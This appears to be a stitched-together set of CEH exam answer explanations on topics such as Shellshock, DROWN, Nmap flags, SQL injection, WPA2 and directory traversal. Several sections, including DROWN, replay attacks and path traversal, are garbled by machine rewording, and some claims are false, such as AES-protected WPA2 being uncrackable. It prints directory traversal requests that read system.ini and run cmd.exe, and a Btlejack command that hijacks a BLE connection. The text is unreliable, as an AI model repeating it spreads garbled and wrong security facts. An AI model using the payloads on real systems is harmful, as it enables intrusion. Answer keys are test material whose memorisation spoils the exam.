Installing a web application firewall, limiting the number of concurrent connections to the server, and encrypting the company’s website with SSL/TLS are also good practices to secure a web server, but they are not as critical as updating and patching the server software. A web application firewall can filter and block malicious requests, but it cannot prevent attacks that exploit unpatched vulnerabilities in the server software. Limiting the number of concurrent connections to the server can prevent overload and improve performance, but it cannot stop attackers from sending malicious requests or payloads. Encrypting the company’s website with SSL/TLS can protect the data in transit between the server and the client, but it cannot protect the data at rest on the server or prevent attacks that target the server itself.

Therefore, the priority action to secure a web server from common threats is to regularly update and patch the server software.

Shellshock (CVE-2014-6271) is a vulnerability in the GNU Bash (Bourne Again Shell) that allows remote code execution via crafted environment variables. It was disclosed in 2014 and had a wide impact on systems that relied on Bash as a command-line shell interpreter.

Affected systems include:

Linux distributions (Red Hat, Debian, CentOS, Ubuntu, etc.)

Unix variants (e.g., FreeBSD, OpenBSD, etc.)

Apple macOS (formerly OS X), since it uses Bash as the default shell

Windows systems were not directly affected because they do not use Bash by default. Bash is not a native component of Windows operating systems, and Shellshock exploits Bash-specific behavior. Only Windows systems where Bash was manually installed through a third-party method or environment (e.g., Cygwin) might be susceptible — but by default, Windows systems are immune.

Incorrect options:

A. Linux — Affected

B. Unix — Affected

C. OS X — Affected

D. Windows — Not directly affected (Correct answer)

DROWN is a serious vulnerability that affects HTTPS and other services that deem SSL and TLS, some of the essential cryptographic protocols for net security. These protocols allow everyone on the net to browse the net, use email, look on-line, and send instant messages while not third-parties being able to browse the communication.

DROWN allows attackers to break the encryption and read or steal sensitive communications, as well as passwords, credit card numbers, trade secrets, or financial data. At the time of public disclosure on March 2016, our measurements indicated thirty third of all HTTPS servers were vulnerable to the attack. fortuitously, the vulnerability is much less prevalent currently. As of 2019, SSL Labs estimates that one.2% of HTTPS servers are vulnerable.

What will the attackers gain?

Any communication between users and the server. This typically includes, however isn’t limited to, usernames and passwords, credit card numbers, emails, instant messages, and sensitive documents. under some common scenarios, an attacker can also impersonate a secure web site and intercept or change the content the user sees.

Who is vulnerable?

Websites, mail servers, and other TLS-dependent services are in danger for the DROWN attack. At the time of public disclosure, many popular sites were affected. we used Internet-wide scanning to live how many sites are vulnerable:

Operators of vulnerable servers got to take action. there’s nothing practical that browsers or end-users will do on their own to protect against this attack.

Is my site vulnerable?

Modern servers and shoppers use the TLS encryption protocol. However, because of misconfigurations, several servers also still support SSLv2, a 1990s-era precursor to TLS. This support did not matter in practice, since no up-to-date clients really use SSLv2. Therefore, despite the fact that SSLv2 is thought to be badly insecure, until now, simply supporting SSLv2 wasn’t thought of a security problem, is a clients never used it.

DROWN shows that merely supporting SSLv2 may be a threat to fashionable servers and clients. It modern associate degree attacker to modern fashionable TLS connections between up-to-date clients and servers by sending probes to a server that supports SSLv2 and uses the same private key.

A server is vulnerable to DROWN if:

It allows SSLv2 connections. This is surprisingly common, due to misconfiguration and inappropriate default settings.

Its private key is used on any other serverthat allows SSLv2 connections, even for another protocol. Many companies reuse the same certificate and key on their web and email servers, for instance. In this case, if the email server supports SSLv2 and the web server does not, an attacker can take advantage of the email server to break TLS connections to the web server.

How do I protect my server?

To protect against DROWN, server operators need to ensure that their private keys software used anyplace with server computer code that enables SSLv2 connections. This includes net servers, SMTP servers, IMAP and POP servers, and the other software that supports SSL/TLS.

Disabling SSLv2 is difficult and depends on the particular server software. we offer instructions here for many common products:

OpenSSL: OpenSSL may be a science library employed in several server merchandise. For users of OpenSSL, the simplest and recommended solution is to upgrade to a recent OpenSSL version. OpenSSL 1.0.2 users ought to upgrade to 1.0.2g. OpenSSL 1.0.1 users ought to upgrade to one.0.1s. Users of older OpenSSL versions ought to upgrade to either one in every of these versions. (Updated March thirteenth, 16:00 UTC) Microsoft IIS (Windows Server): Support for SSLv2 on the server aspect is enabled by default only on the OS versions that correspond to IIS 7.0 and IIS seven.5, particularly Windows scene, Windows Server 2008, Windows seven and Windows Server 2008R2. This support is disabled within the appropriate SSLv2 subkey for ‘Server’, as outlined in KB245030. albeit users haven’t taken the steps to disable SSLv2, the export-grade and 56-bit ciphers that build DROWN possible don’t seem to be supported by default.

Network Security Services (NSS): NSS may be a common science library designed into several server merchandise. NSS versions three.13 (released back in 2012) and higher than ought to have SSLv2 disabled by default. (A little variety of users might have enabled SSLv2 manually and can got to take steps to disable it.) Users of older versions ought to upgrade to a more moderen version. we tend to still advocate checking whether or not your non-public secret is exposed elsewhere

Other affected software and in operation systems:

Instructions and data for: Apache, Postfix, Nginx, Debian, Red Hat

Browsers and other consumers: practical nothing practical that net browsers or different client computer code will do to stop DROWN. only server operators ar ready to take action to guard against the attack.

Replay Attack could be a variety of security attack to the info sent over a network.

In this attack, the hacker or a person with unauthorized access, captures the traffic and sends communication to its original destination, acting because the original sender. The receiver feels that it’s Associate in Nursing genuine message however it’s really the message sent by the aggressor. the most feature of the Replay Attack is that the consumer would receive the message double, thence the name, Replay Attack.

Prevention from Replay Attack :

1. Timestamp technique –

Prevention from such attackers is feasible, if timestamp is employed at the side of the info. Supposedly, the timestamp on an information is over a precise limit, it may be discarded, and sender may be asked to send the info once more.

2. Session key technique –

Another way of hindrance, is by victimisation session key. This key may be used one time (by sender and receiver) per dealing, and can’t be reused.

The most plausible reason for the situation is that the secure LDAP connection was not properly initialized due to a lack of ‘use_ssl = True’ in the server object creation. To use secure LDAP (LDAPS), the CEH needs to specify the use_ssl parameter as True when creating the server object with the ldap3 library in Python. This parameter tells the library to use SSL/TLS encryption for the LDAP communication. If the parameter is omitted or set to False, the library will use plain LDAP, which may not be accepted by the target system that only allows secure LDAP connections12. For example, the CEH can use the following code to create a secure LDAP server object:

from ldap3 import Server, Connection, ALL

server = Server('ldaps://', use_ssl=True, get_info=ALL)

connection = Connection(server, user='', password='')

connection.bind()

The other options are not as plausible as option B for the following reasons:

A. The Python version installed on the CEH’s machine is incompatible with the ldap3 library: This option is unlikely because the ldap3 library supports Python versions from 2.6 to 3.9, which covers most of the commonly used Python versions3. Moreover, if the Python version was incompatible, the CEH would not be able to install the library or import it in the code, and would encounter errors before establishing the connection.

C. The enumeration process was blocked by the target system’s intrusion detection system: This option is possible but not very plausible because the CEH was able to establish a connection with the target, which means the intrusion detection system did not block the initial handshake. Moreover, the enumeration process would not affect the response of the target system, but rather the visibility of the results. If the intrusion detection system detected and blocked the enumeration, the CEH would receive an error message or a blank response, not an unexpected response.

D. The system failed to establish a connection due to an incorrect port number: This option is incorrect because the CEH was able to establish a connection with the target, which means the port number was correct. If the port number was incorrect, the CEH would not be able to connect to the target system at all, and would receive a connection refused error.

The recommended architecture for secure web application deployment is a multi-tiered setup:

Web server in the DMZ (public-facing)

Application server on the internal network

Database server on the internal network

This design limits the exposure of critical components. Only the web server is exposed to the internet, while application and database servers are shielded by firewalls and only accessible internally.

Reference – CEH v13 Official Study Guide:

Module 10: Hacking Web Servers

Quote:

“Place the web server in the DMZ and keep the application and database servers within the internal network. This reduces the attack surface and provides layered security.”

Incorrect Options Explained:

A. Internal placement makes them inaccessible externally.

C & D. Exposing the database or all servers to the internet introduces significant risk.

===========

Comprehensive and Detailed Explanation:

Blind SQL injection is used when the application does not return errors or display query results. In such cases, attackers use inference methods such as:

Boolean-based queries

Time-based queries (e.g., using SLEEP or WAITFOR DELAY)

Elliot’s use of timing delays indicates a time-based blind SQL injection.

From CEH v13 Courseware:

Module 10: Web Application Hacking → SQL Injection Types

In CEH v13 Module 03: Scanning Networks, under the Nmap Host Discovery Techniques, TCP SYN ping scan is explained as one of the methods used to determine whether a host is online by sending SYN packets to specified TCP ports.

When using Nmap:

-PS specifies a TCP SYN ping scan. It sends SYN packets to a given port (by default port 80, unless specified) to check whether a host is up and whether the port is open.

The response type to this SYN packet determines the host status:

If a SYN/ACK is received, it indicates the port is open, and the host is up.

If RST is received, the port is closed, but the host is still considered online.

If no response or ICMP unreachable is received, the host may be down or filtered.

Clarification of options:

A. -pp: This is not a valid Nmap option.

B. -PO: This sends IP Protocol Ping, used less frequently and not the same as SYN ping.

C. -PS: Correct. Performs a TCP SYN Ping Scan.

D. -PA: Sends TCP ACK Ping, used to determine firewall presence but not the same as SYN scan.

Reference from CEH v13 Study Guide and Course Material:

CEH v13 Official Module 03 – Scanning Networks, Slide: Nmap Host Discovery Techniques

EC-Council iLabs - Scanning Networks Practical Lab Guide: Section on nmap -sn -PS

Nmap Official Documentation (also referenced in CEH): https://nmap.org/book/man-host-discovery.html

Out-of-band SQL injection occurs when an attacker is unable to use an equivalent channel to launch the attack and gather results. … Out-of-band SQLi techniques would believe the database server’s ability to form DNS or HTTP requests to deliver data to an attacker. Out-of-band SQL injection is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL injection occurs when an attacker is unable to use the same channel to launch the attack and gather results.

Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an inferential time-based attack unreliable).

Out-of-band SQLi techniques would rely on the database server’s ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Server’s xp_dirtree command, which can be used to make DNS requests to a server an attacker controls; as well as Oracle Database’s UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls.

In CEH v13 Module 03: Scanning Networks, Nmap's evasion techniques are discussed for bypassing or confusing Intrusion Detection Systems (IDS) and firewalls.

The -D option in Nmap is used to enable decoy scanning. It inserts false IP addresses in the scan to obfuscate the true origin of the scan.

This technique helps in masking the attacker’s IP and can confuse IDS logs.

Option Clarification:

A. -n/-R: Disables DNS resolution (-n) or uses reverse DNS (-R), does not evade detection.

B. -0N/-0X/-0G: Output formats (normal, XML, grepable), not related to evasion.

C. -T: Controls timing (e.g., -T0 is stealthy, -T5 is aggressive), but not explicitly for IDS evasion.

D. -D: Correct. Used for IDS/firewall evasion by using decoy IPs.

The network is using an uncrackable encryption method, which makes it difficult to crack the Wi-Fi password. WPA2 Personal with AES encryption is the strongest form of security offered by Wi-Fi devices at the moment, and it should be used for all purposes. AES stands for Advanced Encryption Standard, and it is a symmetric-key algorithm that uses a 128-bit, 192-bit, or 256-bit key to encrypt and decrypt data. AES is considered to be uncrackable by brute force attacks, as it would take an impractical amount of time and computational power to try all possible key combinations12. Therefore, unless you have access to the Wi-Fi password or the encryption key, you will not be able to decrypt the network traffic and crack the password.

The other options are not correct for the following reasons:

A. The Wi-Fi password is too complex and long: This option is not relevant because the Wi-Fi password is not directly used to encrypt the network traffic. Instead, the password is used to generate a Pre-Shared Key (PSK), which is then used to derive a Pairwise Master Key (PMK), which is then used to derive a Pairwise Transient Key (PTK), which is then used to encrypt the data. Therefore, the complexity and length of the password do not affect the encryption strength, as long as the password is not easily guessed or leaked34.

B. Your hacking tool is outdated: This option is not plausible because even if your hacking tool is outdated, it would not affect your ability to capture the network traffic and attempt to crack the password. The hacking tool may not support the latest Wi-Fi standards or protocols, but it should still be able to capture the raw data packets and save them in a file. The cracking process would depend on the encryption algorithm and the key, not on the hacking tool.

D. The network is using MAC address filtering: This option is not feasible because MAC address filtering is a technique that restricts network access and communication to trusted devices based on their MAC addresses, which are unique identifiers assigned to network interfaces. MAC address filtering can prevent unauthorized devices from joining the network, but it cannot prevent authorized devices from capturing the network traffic. Moreover, MAC address filtering can be easily bypassed by spoofing the MAC address of an allowed device56.

Comprehensive and Detailed Explanation:

The correct nslookup syntax to perform a zone transfer is:

ls -d domain_name

So, from the nslookup prompt:

server 192.168.10.2

ls -d abccorp.local

This will attempt to list all DNS records for the abccorp.local domain from the specified server, if zone transfers are permitted.

From CEH v13 Courseware:

Module 4: Enumeration → DNS Zone Transfers

Twofish is an encryption algorithm designed by Bruce Schneier. It’s a symmetric key block cipher with a block size of 128 bits, with keys up to 256 bits. it’s associated with AES (Advanced Encryption Standard) and an earlier block cipher called Blowfish. Twofish was actually a finalist to become the industry standard for encryption, but was ultimately beaten out by the present AES.

Twofish has some distinctive features that set it aside from most other cryptographic protocols. For one, it uses pre-computed, key-dependent S-boxes. An S-box (substitution-box) may be a basic component of any symmetric key algorithm which performs substitution. within the context of Twofish’s block cipher, the S-box works to obscure the connection of the key to the ciphertext. Twofish uses a pre-computed, key-dependent S-box which suggests that the S-box is already provided, but depends on the cipher key to decrypt the knowledge .

How Secure is Twofish?

Twofish is seen as a really secure option as far as encryption protocols go. one among the explanations that it wasn’t selected because the advanced encryption standard is thanks to its slower speed. Any encryption standard that uses a 128-bit or higher key, is theoretically safe from brute force attacks. Twofish is during this category.

Because Twofish uses “pre-computed key-dependent S-boxes”, it are often susceptible to side channel attacks. this is often thanks to the tables being pre-computed. However, making these tables key-dependent helps mitigate that risk. There are a couple of attacks on Twofish, but consistent with its creator, Bruce Schneier, it didn’t constitute a real cryptanalysis. These attacks didn’t constitue a practical break within the cipher.

Products That Use Twofish

GnuPG: GnuPG may be a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also referred to as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a flexible key management system, along side access modules for all types of public key directories.

KeePass: KeePass may be a password management tool that generates passwords with top-notch security. It’s a free, open source, lightweight and easy-to-use password manager with many extensions and plugins.

Password Safe: Password Safe uses one master password to stay all of your passwords protected, almost like the functionality of most of the password managers on this list. It allows you to store all of your passwords during a single password database, or multiple databases for various purposes. Creating a database is straightforward , just create the database, set your master password.

PGP (Pretty Good Privacy): PGP is employed mostly for email encryption, it encrypts the content of the e-mail . However, Pretty Good Privacy doesn’t encrypt the topic and sender of the e-mail , so make certain to never put sensitive information in these fields when using PGP.

TrueCrypt: TrueCrypt may be a software program that encrypts and protects files on your devices. With TrueCrypt the encryption is transparent to the user and is completed locally at the user’s computer. this suggests you’ll store a TrueCrypt file on a server and TrueCrypt will encrypt that file before it’s sent over the network.

Appropriately controlling admittance to web content is significant for running a safe web worker. Index crossing or Path Traversal is a HTTP assault which permits aggressors to get to limited catalogs and execute orders outside of the web worker’s root registry.

Web workers give two primary degrees of security instruments

Access Control Lists (ACLs)

Root index

An Access Control List is utilized in the approval cycle. It is a rundown which the web worker’s manager uses to show which clients or gatherings can get to, change or execute specific records on the worker, just as other access rights.

The root registry is a particular index on the worker record framework in which the clients are kept. Clients can’t get to anything over this root.

For instance: the default root registry of IIS on Windows is C:\Inetpub\wwwroot and with this arrangement, a client doesn’t approach C:\Windows yet approaches C:\Inetpub\wwwroot\news and some other indexes and documents under the root catalog (given that the client is confirmed by means of the ACLs).

The root index keeps clients from getting to any documents on the worker, for example, C:\WINDOWS/system32/win.ini on Windows stages and the/and so on/passwd record on Linux/UNIX stages.

This weakness can exist either in the web worker programming itself or in the web application code.

To play out a registry crossing assault, all an assailant requires is an internet browser and some information on where to aimlessly discover any default documents and registries on the framework.

What an assailant can do if your site is defenseless

With a framework defenseless against index crossing, an aggressor can utilize this weakness to venture out of the root catalog and access different pieces of the record framework. This may enable the assailant to see confined documents, which could give the aggressor more data needed to additional trade off the framework.

Contingent upon how the site access is set up, the aggressor will execute orders by mimicking himself as the client which is related with “the site”. Along these lines everything relies upon what the site client has been offered admittance to in the framework.

Illustration of a Directory Traversal assault by means of web application code

In web applications with dynamic pages, input is generally gotten from programs through GET or POST solicitation techniques. Here is an illustration of a HTTP GET demand URL

GET http://test.webarticles.com/show.asp?view=oldarchive.html HTTP/1.1

Host: test.webarticles.com

With this URL, the browser requests the dynamic page show.asp from the server and with it also sends the parameter view with the value of oldarchive.html. When this request is executed on the web server, show.asp retrieves the file oldarchive.html from the server’s file system, renders it and then sends it back to the browser which displays it to the user. The attacker would assume that show.asp can retrieve files from the file system and sends the following custom URL.

GET http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini HTTP/1.1

Host: test.webarticles.com

This will cause the dynamic page to retrieve the file system.ini from the file system and display it to the user. The expression ../ instructs the system to go one directory up which is commonly used as an operating system directive. The attacker has to guess how many directories he has to go up to find the Windows folder on the system, but this is easily done by trial and error.

Example of a Directory Traversal attack via web server

Apart from vulnerabilities in the code, even the web server itself can be open to directory traversal attacks. The problem can either be incorporated into the web server software or inside some sample script files left available on the server.

The vulnerability has been fixed in the latest versions of web server software, but there are web servers online which are still using older versions of IIS and Apache which might be open to directory traversal attacks. Even though you might be using a web server software version that has fixed this vulnerability, you might still have some sensitive default script directories exposed which are well known to hackers.

For example, a URL request which makes use of the scripts directory of IIS to traverse directories and execute a command can be

GET http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\ HTTP/1.1

Host: server.com

The request would return to the user a list of all files in the C:\ directory by executing the cmd.exe command shell file and run the command dir c:\ in the shell. The %5c expression that is in the URL request is a web server escape code which is used to represent normal characters. In this case %5c represents the character \.

Newer versions of modern web server software check for these escape codes and do not let them through. Some older versions however, do not filter out these codes in the root directory enforcer and will let the attackers execute such commands.

User-directed spidering is a technique that allows the hacker to manually browse the target website and use a proxy or spider tool to capture and analyze the traffic. This way, the hacker can discover hidden or dynamic content that standard web spiders may miss due to a specific file in the root directory, such as robots.txt, that instructs them not to crawl certain pages or directories. User-directed spidering can also help the hacker to bypass authentication or authorization mechanisms, as well as identify vulnerabilities or sensitive information in the target website. User-directed spidering can be performed with tools like Burp Suite and WebScarab, which are web application security testing tools that can intercept, modify, and replay HTTP requests and responses, as well as perform various attacks and scans on the target website.

The other options are not likely to achieve the same results as user-directed spidering. Using Photon to retrieve archived URLs of the target website from archive.org may provide some historical information about the website, but it may not reflect the current state or content of the website. Using the Netcraft tool to gather website information may provide some general information about the website, such as its IP address, domain name, server software, or hosting provider, but it may not reveal the specific files or web pages on the website. Examining HTML source code and cookies may provide some clues about the website’s structure, functionality, or user preferences, but it may not expose the hidden or dynamic content that user-directed spidering can discover. References:

User Directed Spidering with Burp

Web Spidering - What Are Web Crawlers & How to Control Them

Web Security: Recon

Mapping the Application for Penetrating Web Applications — 1

Comprehensive and Detailed Explanation:

To identify inconsistencies in secure asset records and confirm that systems meet baseline security standards, vulnerability scanning and checking data items (e.g., configuration settings, software versions) is essential. This helps the analyst discover gaps between expected and actual system states.

From CEH v13 Official Curriculum:

Module 5: Vulnerability Assessment → Security Assessment Techniques

“Automated vulnerability scanners and asset inventories help validate that systems are compliant with security baselines.”

The described scenario is a textbook example of a Man-in-the-Middle (MITM) attack. In such attacks, the attacker stealthily places themselves between two communicating systems, intercepts their communications, and may even modify the traffic. The communicating parties remain unaware that their traffic is being monitored or altered.

Eric is using the Dsniff toolset, which is well-known for enabling MITM attacks through techniques such as:

ARP spoofing (to redirect traffic)

Credential sniffing

Packet manipulation

From CEH v13 Official Courseware:

Module 8: Sniffing

Module 11: Session Hijacking

CEH v13 Study Guide states:

“In a man-in-the-middle (MITM) attack, the attacker intercepts and potentially alters the communication between two systems without either party knowing. Tools like Dsniff, Cain & Abel, and Ettercap are commonly used to launch such attacks.”

Incorrect Options:

A: “Interceptor” is not a technical term in cybersecurity.

C: ARP Proxy is a network feature; while ARP spoofing can be part of a MITM attack, it’s not the attack classification itself.

D: Poisoning (like DNS or ARP poisoning) is often a technique used to initiate MITM but not the final classification.

A hybrid attack is a method that combines the dictionary attack with brute-force techniques. It starts with a list of known words (like in a dictionary attack) and then mutates them by:

Appending or prepending numbers (e.g., password1, 123hello)

Adding special characters (e.g., P@ssword!, admin#123)

Varying letter casing or leetspeak (e.g., h@x0r)

From CEH v13 Courseware:

Module 6: Malware Threats → Password Cracking Methods

Incorrect Options:

B: Linear is not a password cracking method.

C: Symmetric refers to encryption, not password cracking.

D: Brute-force tries every possible combination but does not start with a word list.

Btlejack is a tool used for attacking Bluetooth Low Energy (BLE) connections, including sniffing, jamming, and hijacking.

The -f option specifies the access address of the BLE connection.

The -j option is used to hijack an active BLE connection.

Therefore, the correct syntax to hijack a BLE connection is:

btlejack -f [access_address] -j

This matches Option A: btlejack -f 0x129f3244 -j

Incorrect Options:

B. -c any is used for sniffing any advertising packet but not for hijacking.

C. -d specifies device paths; -s starts a scan but does not hijack.

D. This is likely a malformed or unrelated command in the context of hijacking.

Reference – CEH v13 Official Courseware:

Module 18: IoT and OT Hacking

Section: “Bluetooth Low Energy (BLE) Attacks”

Tool Focus: “Btlejack Command Usage”

CEH iLab: Btlejacking with micro:bit

JXplorer could be a cross platform LDAP browser and editor. it’s a standards compliant general purpose LDAP client which will be used to search, scan and edit any commonplace LDAP directory, or any directory service with an LDAP or DSML interface.

It is extremely flexible and can be extended and custom in a very number of the way. JXplorer is written in java, and also the source code and source code build system ar obtainable via svn or as a packaged build for users who wish to experiment or any develop the program.

JX is is available in 2 versions; the free open source version under an OSI Apache two style licence, or within the JXWorkBench Enterprise bundle with inbuilt reporting, administrative and security tools.

JX has been through a number of different versions since its creation in 1999; the foremost recent stable release is version 3.3.1, the August 2013 release.

JXplorer could be a absolutely useful LDAP consumer with advanced security integration and support for the harder and obscure elements of the LDAP protocol. it’s been tested on Windows, Solaris, linux and OSX, packages are obtainable for HPUX, AIX, BSD and it should run on any java supporting OS.

In CEH v13 Module 11: Hacking Wireless Networks, antenna types are critical for wireless communications, signal strength, and attack range.

Yagi Antenna

A directional antenna designed to operate in VHF (30 MHz to 300 MHz) and UHF (300 MHz to 3 GHz) frequency bands.

Frequently used for point-to-point communication, such as long-distance Wi-Fi or directional signal monitoring.

Offers high gain, narrow beamwidth, and works well for capturing or projecting signals over long distances.

Why Other Options Are Incorrect:

B. Dipole antenna: Typically omnidirectional; less gain; not optimized for long-distance VHF/UHF.

C. Parabolic grid antenna: Used in microwave and satellite frequencies; not suited for 10 MHz–VHF.

D. Omnidirectional antenna: Broadcasts in all directions; used in short-range access points.

In a session donation attack, the attacker donates their own session ID to the target user. In this

attack, the attacker first obtains a valid session ID by logging into a service and later feeds the same session ID to the target user. This session ID links a target user to the attacker's account page without disclosing any information to the victim. When the target user clicks on the link and enters the details (username, password, payment details, etc.) in a form, the entered

details are linked to the attacker's account. To initiate this attack, the attacker can send their

session ID using techniques such as cross-site cooking, an MITM attack, and session fixation. A

session donation attack involves the following steps.

This is a classic example of Web Parameter Tampering. This occurs when attackers manipulate parameters exchanged between client and server to exploit vulnerabilities in the application logic. In this case:

Damount and Camount are passed via URL parameters.

The web application is not validating or sanitizing the values.

Altering the values affects the transaction outcome.

This is not an SQL Injection (no SQL code shown), nor is it XSS (no script injection), and it is unrelated to Cookie Tampering (which involves browser-stored cookies).

Infrastructure as a Service (IaaS) provides virtualized computing infrastructure over the internet. In this model:

The cloud provider supplies the hardware (servers, storage, networking).

The client (your organization) is responsible for installing and managing the OS, applications, and all configurations.

This aligns with the question, where the organization must take full responsibility for maintenance.

Incorrect Options:

A. PaaS offers managed OS, middleware, and runtime, reducing customer responsibilities.

B. SaaS provides fully managed applications—users only access features.

C. Functions as a Service (FaaS) offers event-driven computing without server management, used in serverless environments.

Reference – CEH v13 Official Courseware:

Module 19: Cloud Computing

Section: “Cloud Service Models”

Table: “Responsibilities in IaaS vs PaaS vs SaaS”

===========

A man-in-the-middle attack using forged ICMP and ARP spoofing is a type of network-level session hijacking attack where an attacker inserts their machine into the communication between a client and a server, making it seem like the packets are flowing through the original path. This technique is primarily used to reroute the packets and intercept or modify the data exchanged between the client and the server.

A man-in-the-middle attack using forged ICMP and ARP spoofing works as follows1:

The attacker sends a forged ICMP redirect message to the client, claiming to be the gateway. The ICMP redirect message tells the client to use the attacker’s machine as the next hop for reaching the server’s network. The client updates its routing table accordingly and starts sending packets to the attacker’s machine instead of the gateway.

The attacker also sends a forged ARP reply message to the client, claiming to be the server. The ARP reply message associates the attacker’s MAC address with the server’s IP address. The client updates its ARP cache accordingly and starts sending packets to the attacker’s MAC address instead of the server’s MAC address.

The attacker receives the packets from the client and forwards them to the server, acting as a relay. The attacker can also monitor, modify, or drop the packets as they wish. The server responds to the packets and sends them back to the attacker, who then forwards them to the client. The client and the server are unaware of the attacker’s presence and think they are communicating directly with each other.

Therefore, Jake is studying a man-in-the-middle attack using forged ICMP and ARP spoofing, which is a type of network-level session hijacking attack.

https://en.wikipedia.org/wiki/Kismet_(software)

Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic.

Comprehensive and Detailed Explanation:

Containers share the same host operating system kernel, unlike VMs which run isolated kernels. This shared kernel increases the attack surface — a compromise in one container can potentially affect the entire host if kernel-level access is obtained.

From CEH v13 Courseware:

Module 14: Hacking Web Applications → Container Security

“Containers are less secure because they share the host kernel. Attackers compromising the container can exploit vulnerabilities in the shared OS.”

According to CEH v13 Module 09: Social Engineering, both pharming and phishing are forms of fraud that direct users to malicious websites. However, their techniques differ:

Pharming involves modifying DNS entries or the victim's host file to silently redirect users to a malicious site without needing user interaction.

Phishing involves sending links via emails or messages where the URL is visually deceptive (misspelled, similar domain names, homoglyph attacks).

Sniffing attacks are a type of network attack that involves intercepting and analyzing data packets as they travel over a network. Sniffing attacks can be used to steal sensitive information, such as usernames, passwords, credit card numbers, etc. Sniffing attacks can also be used to perform reconnaissance, spoofing, or man-in-the-middle attacks.

The IT department of the company has implemented some security measures to prevent or mitigate sniffing attacks, such as:

Adding the MAC address of the gateway to the ARP cache: This prevents ARP spoofing, which is a technique that allows an attacker to redirect network traffic to their own device by sending fake ARP messages that associate their MAC address with the IP address of the gateway.

Switching to IPv6 instead of IPv4: This reduces the risk of IP spoofing, which is a technique that allows an attacker to send packets with a forged source IP address, pretending to be another device on the network.

Using encrypted sessions such as SSH instead of Telnet, and Secure File Transfer Protocol instead of FTP: This protects the data from being read or modified by an attacker who can capture the packets, as the data is encrypted and authenticated using cryptographic protocols.

However, these measures are not enough to completely eliminate the threat of sniffing, as an attacker can still use other techniques, such as:

Passive sniffing: This involves monitoring the network traffic without injecting any packets or altering the data. Passive sniffing can be done on a shared network, such as a hub, or on a switched network, using techniques such as MAC flooding, port mirroring, or VLAN hopping.

Active sniffing: This involves injecting packets or modifying the data to manipulate the network behavior or gain access to more traffic. Active sniffing can be done using techniques such as DHCP spoofing, DNS poisoning, ICMP redirection, or TCP session hijacking.

Therefore, the next step to enhance network security is to implement network scanning and monitoring tools, which can help detect and prevent sniffing attacks by:

Scanning the network for unauthorized devices, such as rogue access points, hubs, or sniffers, and removing them or isolating them from the network.

Monitoring the network for abnormal traffic patterns, such as excessive ARP requests, DNS queries, ICMP messages, or TCP connections, and alerting the network administrators or blocking the suspicious sources.

Analyzing the network traffic for malicious content, such as malware, phishing, or exfiltration, and filtering or quarantining the infected or compromised devices.

In CEH v13 Module 06: Malware Threats, stealth viruses are covered as advanced malware that can evade detection by:

Intercepting system calls related to file access.

Masking their presence in files, memory, or on disk.

Restoring original code temporarily to fool signature-based scanners.

These capabilities allow stealth viruses to:

Avoid detection by antivirus scanners.

Operate undisturbed until triggered.

Option Clarification:

A. Cavity virus: Hides in unused file space but doesn't evade as effectively.

C. File-extension virus: Exploits deceptive file names but is often detected.

D. Macro virus: Targets office documents, not highly evasive.

Correct answer is B. Stealth virus.

Objectives of Footprinting Draw Network Map - Combining footprinting techniques with tools such as Tracert allows the attacker to create diagrammatic representations of the target organization’s network presence. Specficially, it allows attackers to draw a map or outline of the target organization’s network infrastructure to know about the actual environment that they are going to break into. These network diagrams can guide the attacker in performing an attack. (P.114/98)

The best measure to prevent similar attacks without overly restricting the use of personal devices is to conduct regular cybersecurity awareness training, focusing on phishing attacks. Cybersecurity awareness training is a process of educating and empowering employees on the best practices and behaviors to protect themselves and the organization from cyber threats, such as phishing, malware, ransomware, or data breaches. Cybersecurity awareness training can help the organization mitigate the risk of phishing incidents by providing the following benefits12:

It can increase the knowledge and skills of employees on how to identify and avoid phishing emails, messages, or links, such as by checking the sender, the subject, the content, the attachments, and the URL of the message, and by verifying the legitimacy and authenticity of the message before responding or clicking.

It can enhance the attitude and culture of employees on the importance and responsibility of cybersecurity, such as by encouraging them to report any suspicious or malicious activity, to follow the security policies and guidelines, and to seek help or guidance when in doubt or trouble.

It can reduce the human error and negligence that are often the main causes of phishing incidents, such as by reminding employees to update their devices and applications, to use strong and unique passwords, to enable multi-factor authentication, and to backup their data regularly.

The other options are not as optimal as option D for the following reasons:

A. Provide employees with corporate-owned devices for work-related tasks: This option is not feasible because it contradicts the BYOD policy, which allows employees to use their personal devices for work-related tasks. Providing employees with corporate-owned devices would require the organization to incur additional costs and resources, such as purchasing, maintaining, and securing the devices, as well as training and supporting the employees on how to use them. Moreover, providing employees with corporate-owned devices would not necessarily prevent phishing incidents, as the devices could still be compromised by phishing emails, messages, or links, unless the organization implements strict security controls and policies on the devices, which may limit the user autonomy and productivity3.

B. Implement a mobile device management solution that restricts the installation of non-approved applications: This option is not desirable because it violates the user autonomy and privacy under the BYOD policy, which allows employees to use their personal devices for both personal and professional purposes. Implementing a mobile device management solution that restricts the installation of non-approved applications would require the organization to monitor and control the devices of the employees, which may raise legal and ethical issues, such as data ownership, consent, and compliance. Furthermore, implementing a mobile device management solution that restricts the installation of non-approved applications would not completely prevent phishing incidents, as the employees could still receive phishing emails, messages, or links through the approved applications, unless the organization implements strict security controls and policies on the applications, which may affect the user experience and functionality4.

C. Require all employee devices to use a company-provided VPN for internet access: This option is not sufficient because it does not address the root cause of phishing incidents, which is the human factor. Requiring all employee devices to use a company-provided VPN for internet access would provide the organization with some benefits, such as encrypting the network traffic, hiding the IP address, and bypassing geo-restrictions. However, requiring all employee devices to use a company-provided VPN for internet access would not prevent phishing incidents, as the employees could still fall victim to phishing emails, messages, or links that lure them to malicious websites or applications, unless the organization implements strict security controls and policies on the VPN, which may affect the network performance and reliability.

